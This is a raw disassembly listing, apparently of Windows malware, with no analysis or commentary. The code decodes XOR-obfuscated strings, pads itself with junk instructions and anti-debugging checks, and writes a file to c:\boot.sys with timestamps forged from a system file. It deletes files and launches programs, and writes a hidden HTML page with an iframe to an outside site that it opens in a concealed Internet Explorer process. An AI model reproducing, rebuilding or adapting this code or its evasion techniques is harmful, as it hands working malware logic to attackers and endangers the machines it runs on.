loc_4080AD: ; CODE XREF: .text:004080A7�j
call sub_40C574 ; GetProcessHeap
lea ecx, byte_41EB90
or eax, 0FFFFFFFFh
loc_4080BB: ; CODE XREF: .text:004080C0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4080BB
mov edi, eax
add edi, 1
push edi
push offset byte_41EB90
push dword ptr [ebp+0Ch]
call sub_40C9F4
add esp, 0Ch
mov eax, 1
loc_4080DD: ; CODE XREF: .text:00408095�j
; .text:004080AB�j
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080E0 proc near ; CODE XREF: sub_408189+21F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441438
lea eax, ds:414490h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_4], 7
xor edi, edi
jmp short loc_408126
; ---------------------------------------------------------------------------
loc_40810F: ; CODE XREF: sub_4080E0+48�j
mov eax, dword_441438
add eax, edi
lea eax, ds:414490h[eax]
movsx edx, byte ptr [eax]
xor edx, 9
mov [eax], dl
inc edi
loc_408126: ; CODE XREF: sub_4080E0+2D�j
cmp edi, esi
jl short loc_40810F
mov [ebp+var_8], 1ADh
mov eax, dword_441438
add eax, esi
mov byte ptr ds:dword_414490[eax], 0
xor edi, edi
mov edi, dword_441438
add dword_441438, 2
mov eax, dword_441438
add eax, 5
add eax, esi
mov dword_441438, eax
add dword_441438, 2
cmp dword_441438, 0DECh
jle short loc_408178
and dword_441438, 0
loc_408178: ; CODE XREF: sub_4080E0+8F�j
mov [ebp+var_C], 187h
lea eax, dword_414490[edi]
pop edi
pop esi
leave
retn
sub_4080E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408189 proc near ; DATA XREF: sub_40A766+7ED�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
xor ebx, ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
loc_40819F: ; CODE XREF: sub_408189+140�j
; sub_408189+14B�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 3Ah
jnz loc_4082B3
mov [ebp+var_D], 8Fh
add [ebp+var_D], 1
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jz short loc_4081C9
cmp byte ptr [ebx+eax+14h], 20h
jnz loc_4082B3
loc_4081C9: ; CODE XREF: sub_408189+33�j
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
mov al, [ebx+eax+1]
cmp al, 34h
jz short loc_4081E1
cmp al, 35h
jnz loc_4082B3
loc_4081E1: ; CODE XREF: sub_408189+4E�j
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jnz short loc_4081F4
mov [ebp+var_4], 10h
jmp short loc_4081FB
; ---------------------------------------------------------------------------
loc_4081F4: ; CODE XREF: sub_408189+60�j
mov [ebp+var_4], 13h
loc_4081FB: ; CODE XREF: sub_408189+69�j
mov [ebp+var_5], 0
xor esi, esi
jmp loc_408286
; ---------------------------------------------------------------------------
loc_408206: ; CODE XREF: sub_408189+100�j
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_4], 13h
jnz short loc_40824E
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_40824E
mov edi, 5
mov edx, esi
inc edx
mov [ebp+var_1C], edx
mov [ebp+var_14], edi
mov eax, edx
mov [ebp+var_18], eax
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_20], eax
mov eax, edi
mov edi, [ebp+var_20]
mul [ebp+var_20]
mov [ebp+var_24], eax
mov edi, [ebp+var_1C]
mov edx, eax
cmp edx, edi
jz short loc_408285
loc_40824E: ; CODE XREF: sub_408189+86�j
; sub_408189+93�j
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408265
cmp al, 39h
jle short loc_408267
loc_408265: ; CODE XREF: sub_408189+D6�j
jmp short loc_4082B3
; ---------------------------------------------------------------------------
loc_408267: ; CODE XREF: sub_408189+DA�j
call sub_40C5A4 ; GetVersion
movzx eax, [ebp+var_5]
lea edx, [ebx+esi+1]
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_432F00[eax], dl
add [ebp+var_5], 1
loc_408285: ; CODE XREF: sub_408189+C3�j
inc esi
loc_408286: ; CODE XREF: sub_408189+78�j
cmp esi, [ebp+var_4]
jb loc_408206
mov eax, [ebp+var_4]
mov ds:byte_432F00[eax], 0
call sub_401334
or eax, eax
jz short loc_4082AA
call sub_40C514 ; GetCurrentThreadId
jmp short loc_4082B3
; ---------------------------------------------------------------------------
loc_4082AA: ; CODE XREF: sub_408189+118�j
mov [ebp+var_C], 1
jmp short loc_40830A
; ---------------------------------------------------------------------------
loc_4082B3: ; CODE XREF: sub_408189+1D�j
; sub_408189+3A�j ...
inc ebx
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jz short loc_408306
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 3Ch
jnz loc_40819F
cmp byte ptr [ebx+eax+1], 46h
jnz loc_40819F
cmp byte ptr [ebx+eax+2], 4Fh
jnz loc_40819F
cmp byte ptr [ebx+eax+3], 52h
jnz loc_40819F
cmp byte ptr [ebx+eax+4], 4Dh
jnz loc_40819F
cmp byte ptr [ebx+eax+5], 5Fh
jnz loc_40819F
loc_408306: ; CODE XREF: sub_408189+132�j
and [ebp+var_C], 0
loc_40830A: ; CODE XREF: sub_408189+128�j
cmp [ebp+var_C], 0
jz short loc_40831F
mov eax, ds:dword_42EB94
mov dword_43B214, eax
jmp loc_4083E0
; ---------------------------------------------------------------------------
loc_40831F: ; CODE XREF: sub_408189+185�j
mov word ptr [ebp+var_18], 69C0h
movzx eax, word ptr [ebp+var_18]
imul eax, 3F8Fh
mov word ptr [ebp+var_18], ax
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40E010
call sub_40C67C ; CreateFileA
mov [ebp+var_14], eax
call sub_40C508 ; GetCurrentProcessId
push 2
push 0
push 0
push [ebp+var_14]
call sub_40C6AC ; SetFilePointer
mov byte ptr [ebp+var_1C+3], 2Ah
add byte ptr [ebp+var_1C+3], 1
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408372: ; CODE XREF: sub_408189+1EE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408372
mov edi, eax
push 0
lea edx, [ebp+var_20]
push edx
push edi
push [ebp+arg_0]
push [ebp+var_14]
call sub_40C730 ; WriteFile
mov word ptr [ebp+var_18+2], 73F4h
movzx eax, word ptr [ebp+var_18+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_18+2], ax
push 2
push offset byte_445F8B
call sub_4080E0
add esp, 8
push 0
lea edi, [ebp+var_20]
push edi
mov edi, 0Dh
sub edi, dword_441434
push edi
push eax
push [ebp+var_14]
call sub_40C730 ; WriteFile
call sub_40C514 ; GetCurrentThreadId
push [ebp+var_14]
call sub_40C55C ; CloseHandle
mov byte ptr [ebp+var_1C+2], 24h
add byte ptr [ebp+var_1C+2], 36h
loc_4083E0: ; CODE XREF: sub_408189+191�j
pop edi
pop esi
pop ebx
leave
retn
sub_408189 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083E5 proc near ; CODE XREF: sub_40847D+7F�p
; sub_4085D0+E8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 34Dh
push esi
push [ebp+arg_0]
mov eax, dword_445448
lea eax, ds:40D000h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_40842D
; ---------------------------------------------------------------------------
loc_408413: ; CODE XREF: sub_4083E5+4A�j
mov eax, dword_445448
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C8h
mov [eax], dl
inc edi
loc_40842D: ; CODE XREF: sub_4083E5+2C�j
cmp edi, esi
jl short loc_408413
mov eax, dword_445448
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
mov edi, dword_445448
mov eax, edi
add eax, 2
add eax, esi
mov dword_445448, eax
add dword_445448, 2
cmp dword_445448, 0E0Bh
jle short loc_40846C
and dword_445448, 0
loc_40846C: ; CODE XREF: sub_4083E5+7E�j
mov [ebp+var_8], 16Bh
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4083E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40847D proc near ; CODE XREF: sub_4085D0+A4�p
var_239 = byte ptr -239h
var_238 = dword ptr -238h
var_232 = word ptr -232h
var_230 = byte ptr -230h
var_228 = byte ptr -228h
var_220 = byte ptr -220h
var_218 = byte ptr -218h
var_213 = byte ptr -213h
var_10E = word ptr -10Eh
var_10C = word ptr -10Ch
var_10A = word ptr -10Ah
var_107 = byte ptr -107h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 23Ch
push ebx
push esi
push edi
mov [ebp+var_2], 149Fh
sub [ebp+var_2], 654Ch
lea edi, [ebp+var_218]
lea esi, aMvwp ; "Mwp"
mov ecx, 5
rep movsb
mov [ebp+var_10A], 1680h
sub [ebp+var_10A], 13D8h
push 104h
lea eax, [ebp+var_213]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_10C], 696Dh
sub [ebp+var_10C], 0DF2h
lea eax, [ebp+var_213]
push eax
lea eax, [ebp+var_107]
push eax
call sub_40C4B8
call sub_40C598 ; GetTickCount
push 0Dh
push offset byte_445F7D
call sub_4083E5
push eax
lea edi, [ebp+var_107]
push edi
call sub_40CA54
add esp, 10h
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_107]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_10E], 5E47h
sub [ebp+var_10E], 6CA2h
cmp ebx, 0FFFFFFFFh
jz loc_4085CB
mov [ebp+var_232], 5F48h
movzx eax, [ebp+var_232]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_232], ax
lea eax, [ebp+var_230]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
push ebx
call sub_40C52C ; GetFileTime
mov [ebp+var_238], 1E63h
sub [ebp+var_238], 38B1h
lea eax, [ebp+var_230]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_0]
call sub_40C6B8 ; SetFileTime
mov [ebp+var_239], 0Dh
add [ebp+var_239], 54h
push ebx
call sub_40C55C ; CloseHandle
call sub_40C598 ; GetTickCount
loc_4085CB: ; CODE XREF: sub_40847D+C6�j
pop edi
pop esi
pop ebx
leave
retn
sub_40847D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085D0 proc near ; CODE XREF: sub_40A766+A0�p
var_225 = dword ptr -225h
var_221 = byte ptr -221h
var_220 = byte ptr -220h
var_21B = word ptr -21Bh
var_219 = byte ptr -219h
var_115 = byte ptr -115h
var_109 = byte ptr -109h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_106 = word ptr -106h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jnb loc_408730
mov [ebp+var_106], 53DAh
inc [ebp+var_106]
lea edi, [ebp+var_115]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
mov ax, word_44545D
mov [ebp+var_21B], ax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_115]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_107], 56h
add [ebp+var_107], 1
push 0
lea eax, [ebp+var_220]
push eax
push 4001h
push offset dword_44143C
push ebx
call sub_40C730 ; WriteFile
mov [ebp+var_108], 0F0h
sub [ebp+var_108], 6
push ebx
call sub_40847D
call sub_40C508 ; GetCurrentProcessId
push ebx
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_221]
lea esi, byte_44545F
xor ecx, ecx
inc ecx
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov eax, dword_445460
mov [ebp+var_225], eax
push 0Ah
push offset aAFlemcBo ; "渡"
call sub_4083E5
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_219]
push edi
call sub_40CA30
call sub_40C634 ; IsDebuggerPresent
push 1Dh
push offset dword_445F54
call sub_4083E5
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
add esp, 28h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_219]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_109], 0C1h
movzx eax, [ebp+var_109]
imul eax, 2ED3h
mov [ebp+var_109], al
push 0
lea eax, [ebp+var_104]
push eax
call sub_40C724 ; WinExec
call sub_40C598 ; GetTickCount
loc_408730: ; CODE XREF: sub_4085D0+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4085D0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_4454EC
lea eax, ds:431D10h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408775
; ---------------------------------------------------------------------------
loc_40875B: ; CODE XREF: .text:00408777�j
mov eax, dword_4454EC
add eax, edi
lea eax, ds:431D10h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C3h
mov [eax], dl
inc edi
loc_408775: ; CODE XREF: .text:00408759�j
cmp edi, esi
jl short loc_40875B
mov eax, dword_4454EC
add eax, esi
mov byte ptr ds:dword_431D10[eax], 0
mov edi, dword_4454EC
add dword_4454EC, 3
mov eax, dword_4454EC
add eax, 5
add eax, esi
mov dword_4454EC, eax
cmp eax, 0E02h
jle short loc_4087B2
and dword_4454EC, 0
loc_4087B2: ; CODE XREF: .text:004087A9�j
mov dword ptr [ebp-4], 2B6h
lea eax, dword_431D10[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C3 proc near ; CODE XREF: sub_4088D5+4A�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
mov [ebp+var_1], 0A2h
add [ebp+var_1], 1
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40C6E8 ; VirtualAlloc
jmp short loc_4087EE
; ---------------------------------------------------------------------------
mov edi, 369Ah
mov eax, edi
add eax, edi
mov edi, eax
loc_4087EE: ; CODE XREF: sub_4087C3+1E�j
pop edi
leave
retn
sub_4087C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087F1 proc near ; CODE XREF: sub_4088D5+E6�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ax, word_4454F0
mov [ebp+var_2], ax
push 8000h
push 0
push [ebp+arg_0]
call sub_40C6F4 ; VirtualFree
jmp short locret_408815
; ---------------------------------------------------------------------------
call sub_40C514 ; GetCurrentThreadId
locret_408815: ; CODE XREF: sub_4087F1+1D�j
leave
retn
sub_4087F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_4454FC
lea eax, ds:439340h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408857
; ---------------------------------------------------------------------------
loc_40883D: ; CODE XREF: .text:00408859�j
mov eax, dword_4454FC
add eax, edi
lea eax, ds:439340h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C3h
mov [eax], dl
inc edi
loc_408857: ; CODE XREF: .text:0040883B�j
cmp edi, esi
jl short loc_40883D
mov eax, dword_4454FC
add eax, esi
mov byte ptr ds:dword_439340[eax], 0
mov edi, dword_4454FC
add dword_4454FC, 3
mov eax, dword_4454FC
add eax, 5
add eax, esi
mov dword_4454FC, eax
cmp eax, 0E02h
jle short loc_408894
and dword_4454FC, 0
loc_408894: ; CODE XREF: .text:0040888B�j
mov dword ptr [ebp-4], 2B6h
lea eax, dword_439340[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088A5 proc near ; CODE XREF: sub_4088D5+100�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push edi
mov [ebp+var_1], 0A2h
add [ebp+var_1], 1
push offset dword_4454A4
push offset dword_445464
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BA60
mov edi, 369Ah
mov eax, edi
add eax, edi
mov edi, eax
pop edi
leave
retn
sub_4088A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088D5 proc near ; CODE XREF: sub_409847+4BC�p
var_6A = word ptr -6Ah
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_61 = byte ptr -61h
var_5E = word ptr -5Eh
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov ax, word_445500
mov [ebp+var_5E], ax
lea edi, [ebp+var_61]
lea esi, word_445502
mov ecx, 3
rep movsb
lea edi, [ebp+var_64]
lea esi, byte_445505
mov ecx, 3
rep movsb
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408916
add eax, 3Fh
loc_408916: ; CODE XREF: sub_4088D5+3C�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_4087C3
pop ecx
mov [ebp+var_18], eax
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408938
add eax, 3Fh
loc_408938: ; CODE XREF: sub_4088D5+5E�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40C6A0 ; RtlZeroMemory
call sub_40C514 ; GetCurrentThreadId
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40C9F4
add esp, 0Ch
mov eax, dword_445508
mov [ebp+var_68], eax
lea eax, [ebp+var_14]
push eax
call sub_40BB9E
call sub_40C598 ; GetTickCount
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_4089A5
; ---------------------------------------------------------------------------
loc_40897C: ; CODE XREF: sub_4088D5+E1�j
call sub_40C508 ; GetCurrentProcessId
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40BBC5
mov [ebp+var_6A], 3E0Fh
movzx eax, [ebp+var_6A]
imul eax, 4D56h
mov [ebp+var_6A], ax
add ebx, 40h
inc [ebp+var_4]
loc_4089A5: ; CODE XREF: sub_4088D5+A5�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4089B0
add eax, 3Fh
loc_4089B0: ; CODE XREF: sub_4088D5+D6�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40897C
push [ebp+var_18]
call sub_4087F1
mov [ebp+var_1C], 5CDFh
add [ebp+var_1C], 4710h
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_8]
call sub_4088A5
mov eax, dword_4454F4
add eax, 0Eh
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_40C9E8
add esp, 18h
or eax, eax
jz short loc_4089FC
xor eax, eax
inc eax
jmp short loc_408A03
; ---------------------------------------------------------------------------
loc_4089FC: ; CODE XREF: sub_4088D5+120�j
call sub_40C5A4 ; GetVersion
xor eax, eax
loc_408A03: ; CODE XREF: sub_4088D5+125�j
pop edi
pop esi
pop ebx
leave
retn
sub_4088D5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3D4h
push esi
push dword ptr [ebp+8]
mov eax, dword_445514
lea eax, ds:438220h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408A4C
; ---------------------------------------------------------------------------
loc_408A35: ; CODE XREF: .text:00408A4E�j
mov eax, dword_445514
add eax, edi
lea eax, ds:438220h[eax]
movsx edx, byte ptr [eax]
xor edx, 25h
mov [eax], dl
inc edi
loc_408A4C: ; CODE XREF: .text:00408A33�j
cmp edi, esi
jl short loc_408A35
mov eax, dword_445514
add eax, esi
mov byte ptr ds:dword_438220[eax], 0
mov edi, dword_445514
mov eax, edi
add eax, 4
add eax, esi
mov dword_445514, eax
add dword_445514, 3
cmp dword_445514, 0DCBh
jle short loc_408A8B
and dword_445514, 0
loc_408A8B: ; CODE XREF: .text:00408A82�j
lea eax, dword_438220[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A95 proc near ; CODE XREF: sub_409847+40F�p
; sub_409847+434�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1F = byte ptr -1Fh
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_16], 6062h
movzx eax, [ebp+var_16]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_16], ax
call sub_40C634 ; IsDebuggerPresent
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408BB9
; ---------------------------------------------------------------------------
loc_408AD9: ; CODE XREF: sub_408A95+12F�j
call sub_40C634 ; IsDebuggerPresent
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_445518[edi]
mov [ebp+var_4], edi
cmp edi, 0FFFFFFFFh
jz loc_408BB8
lea edi, [ebp+var_1F]
lea esi, aJwouJ? ; "jWOu J?"
movsd
movsd
mov eax, [ebp+var_10]
or eax, eax
jl loc_408BB2
cmp eax, 3
jg loc_408BB2
jmp off_445924[eax*4]
; ---------------------------------------------------------------------------
mov eax, dword_445920
mov [ebp+var_2C], eax
loc_408B25: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:off_445924�o
inc [ebp+var_10]
call sub_40C598 ; GetTickCount
jmp loc_408BB2
; ---------------------------------------------------------------------------
loc_408B32: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:00445928�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
mov [ebp+var_28], 6A69h
mov eax, [ebp+var_28]
mov edx, eax
add edx, eax
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BB2
; ---------------------------------------------------------------------------
loc_408B69: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:0044592C�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BB2
; ---------------------------------------------------------------------------
loc_408B92: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:00445930�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_17], dl
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
and [ebp+var_10], 0
loc_408BB2: ; CODE XREF: sub_408A95+72�j
; sub_408A95+7B�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408BB8: ; CODE XREF: sub_408A95+5C�j
inc ebx
loc_408BB9: ; CODE XREF: sub_408A95+3F�j
cmp byte ptr [ebx], 0
jz short loc_408BCA
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_408AD9
loc_408BCA: ; CODE XREF: sub_408A95+127�j
cmp byte ptr [ebx], 0
jnz short loc_408BDC
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408BDF
; ---------------------------------------------------------------------------
loc_408BDC: ; CODE XREF: sub_408A95+138�j
or eax, 0FFFFFFFFh
loc_408BDF: ; CODE XREF: sub_408A95+145�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BE4 proc near ; CODE XREF: sub_409847:loc_40A5BF�p
var_370 = byte ptr -370h
var_36C = byte ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_24C = byte ptr -24Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 370h
push ebx
push esi
push edi
lea eax, [ebp+var_104]
push eax
push 104h
call sub_40C58C ; GetTempPathA
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_408C0A: ; CODE XREF: sub_408BE4+2B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408C0A
mov esi, eax
push 8
lea ebx, [ebp+var_104]
add ebx, esi
push ebx
call sub_40170F
add esp, 8
push offset a_htm ; ".htm"
lea eax, [ebp+var_104]
push eax
call sub_40CA54
add esp, 8
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_104]
push eax
call sub_40C67C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_408DEA
push 2
push 0
push 0
push edi
call sub_40C6AC ; SetFilePointer
lea ecx, aHtmlIframeSrcH ; "<html><iframe src=http://kavkazcenter.c"...
or eax, 0FFFFFFFFh
loc_408C78: ; CODE XREF: sub_408BE4+99�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408C78
mov esi, eax
push 0
lea ebx, [ebp+var_36C]
push ebx
push esi
push offset aHtmlIframeSrcH ; "<html><iframe src=http://kavkazcenter.c"...
push edi
call sub_40C730 ; WriteFile
push edi
call sub_40C55C ; CloseHandle
mov [ebp+var_364], 104h
lea eax, [ebp+var_370]
push eax
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_360]
push eax
push offset aPath ; "Path"
push offset aSoftwareMicros ; "Software\\Microsoft\\IE Setup\\Setup"
push 80000002h
call sub_4014BD
add esp, 18h
mov [ebp+var_368], eax
cmp [ebp+var_368], 0
jz loc_408DEA
push 104h
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_360]
push eax
call sub_40C4F0 ; ExpandEnvironmentStringsA
push offset aIexplore_exe ; "\\Iexplore.exe "
lea eax, [ebp+var_24C]
push eax
call sub_40CA54
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_24C]
push eax
call sub_40CA54
call sub_404527
mov edi, eax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
add esp, 28h
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
or edi, edi
jz short loc_408D7B
lea eax, [ebp+var_148]
push eax
call sub_4045B7
pop ecx
jmp short loc_408D84
; ---------------------------------------------------------------------------
loc_408D7B: ; CODE XREF: sub_408BE4+186�j
mov [ebp+var_118], 0
loc_408D84: ; CODE XREF: sub_408BE4+195�j
lea eax, [ebp+var_25C]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_24C]
push eax
push 0
call sub_40C70C ; CreateProcessA
or eax, eax
jz short loc_408DDE
push [ebp+var_258]
call sub_40C55C ; CloseHandle
push 0EA60h
call sub_40C9B8
pop ecx
push 0
push [ebp+var_25C]
call sub_40C6DC ; TerminateProcess
push [ebp+var_25C]
call sub_40C55C ; CloseHandle
loc_408DDE: ; CODE XREF: sub_408BE4+1CA�j
lea eax, [ebp+var_104]
push eax
call sub_40C760 ; DeleteFileA
loc_408DEA: ; CODE XREF: sub_408BE4+79�j
